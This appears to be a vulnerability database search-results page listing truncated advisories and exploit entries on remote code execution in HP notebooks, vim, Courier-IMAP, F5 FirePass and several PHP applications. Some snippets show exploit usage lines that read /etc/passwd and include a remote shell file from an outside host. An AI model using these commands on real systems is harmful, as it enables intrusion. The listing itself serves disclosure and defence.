1801 matches found
HP notebooks remote code execution vulnerability (multiple series)
Advisory: ///////// Multiple Hewlett-Packard notebook series are prone to a remote code execution attack. The manufacturer's preinstalled software contains a critical flaw within the software built to support one-touch button quick feature access. Overview: ///////// Software called "HP Info...
HP Compaq Notebooks - ActiveX Remote Code Execution
HP Compaq Notebooks - ActiveX Remote Code Execution !- Advisory: Multiple Hewlett-Packard notebook series are prone to a remote code execution attack. The manufacturer's preinstalled software contains a critical flaw within the software built to support one-touch button quick feature access...
[SECURITY] [DSA 1364-2] New vim packages fix several vulnerabilities
-------------------------------------------------------------------------- Debian Security Advisory DSA 1364-2 [email protected] http://www.debian.org/security/ dann frazier September 19th, 2007 http://www.debian.org/security/faq - -...
DSA-1364-2 vim - several vulnerabilities
Bulletin has no description...
[SECURITY] [DSA 1364-1] New vim packages fix several vulnerabilities
-------------------------------------------------------------------------- Debian Security Advisory DSA 1364-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff September 1st, 2007 http://www.debian.org/security/faq -...
phpDVD v1.0.4 (dvd_config_file) Remote File Include Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? print ' //'=============================================================================================== //'Script : phpDVD v1.0.4 //'Author : iLker Kandemir ilkerkandemiratmynet.com //'S.Page :...
Php Blue Dragon CMS 3.0.0 Remote Code Execution Exploit
No description provided by source. ?php // Exploit Name: Php Blue Dragon CMS 3.0.0 Code Execution Exploit //Script Homepage: http://phpbluedragon.pl/ // Autor: Kacper [email protected] // Autor Homepage: devilteam.eu | kacper.bblog.pl //Pozdrawiam wszystkich ludzi z DEVIL TEAM, Zapraszam na irc...
PHP Blue Dragon CMS 3.0.0 - Remote Code Execution
PHP Blue Dragon CMS 3.0.0 - Remote Code Execution 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i;...
Remote shell command execution in extensions embedding PHPMailer
Multiple TYPO3 extensions is affected by the third party tool PHPMailer, which is vulnerable to a remote shell command execution. Component Type: Third party tool. This tool is not part of the TYPO3 default installation. Affected extensions: agprjmgm version 0.0.1 bbphpmailer version 1.73.1 and a...
F5 FirePass 4100 SSL VPN My.Activiation.PHP3远程命令注入漏洞
F5's FirePass SSL VPN提供使用标准WEB浏览器对应用程序和数据进行安全访问的解决方案。 F5 FirePass 4100不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'my.activation.php3'脚本对用户提交的'username'参数缺少过滤,在部分条件下允许用户注入Linux SHELL命令,导致以WEB权限执行。 F5 FirePass 4100 厂商解决方案 可参考如下安全公告获得补丁信息: https://tech.f5.com/home/solutions/sol167.html...
inoutse-exec.txt
!/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argc this is not a protection for two reasons: i everyone can make a cookie with false credentials ii there isn't any exit or die function after header'Location: index.php' Now look at create...
Fundanemt 2.2.0 - spellcheck.php Remote Code Execution
Fundanemt 2.2.0 - spellcheck.php Remote Code Execution 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i...
[SECURITY] [DSA 1297-1] New gforge-plugin-scmcvs packages fix arbitrary shell command execution
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1297-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff May 24th, 2007 http://www.debian.org/security/faq -...
Alstrasoft Template Seller Pro 3.25 - Remote Code Execution
!/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argc4 echo "Usage: php ".$argv0." Host Path CMD Host: target server ip/hostname Path: path of template CMD: A Shell Command Example: php ".$argv0." localhost /template/ cat /etc/passwd"; die;...
mxbb-rfi.txt
!/usr/bin/php -q -d shortopentag=on cmd: a shell command ls -la Options: -pport: specify a port other than 80 -Pip:port: specify a proxy Example: php '.$argv0.' localhost http://www.shellsite.com/shell.txt ls -la -P1.1.1.1:80 shell.txt:...
CVE-2007-2438
The sandbox for vim allows dangerous functions such as 1 writefile, 2 feedkeys, and 3 system, which might allow user-assisted attackers to execute shell commands and write files via modelines...
CVE-2007-2438
CVE-2007-2438 targets Vim’s sandbox, where modeline parsing grants access to dangerous functions (writefile, feedkeys, system), enabling user-assisted execution of shell commands and file writes. The issue affects Vim components exposed to modelines and has been addressed in multiple advisories a...
CVE-2007-2438
The sandbox for vim allows dangerous functions such as 1 writefile, 2 feedkeys, and 3 system, which might allow user-assisted attackers to execute shell commands and write files via modelines...
GLSA-200704-18 : Courier-IMAP: Remote execution of arbitrary code
The remote host is affected by the vulnerability described in GLSA-200704-18 Courier-IMAP: Remote execution of arbitrary code CJ Kucera has discovered that some Courier-IMAP scripts don't properly handle the XMAILDIR variable, allowing for shell command injection. Impact : A remote attacker could...
Courier-IMAP: Remote execution of arbitrary code
Background Courier-IMAP is an IMAP server which is part of the Courier mail system. It provides access only to maildirs. Description CJ Kucera has discovered that some Courier-IMAP scripts don't properly handle the XMAILDIR variable, allowing for shell command injection. Impact A remote attacker...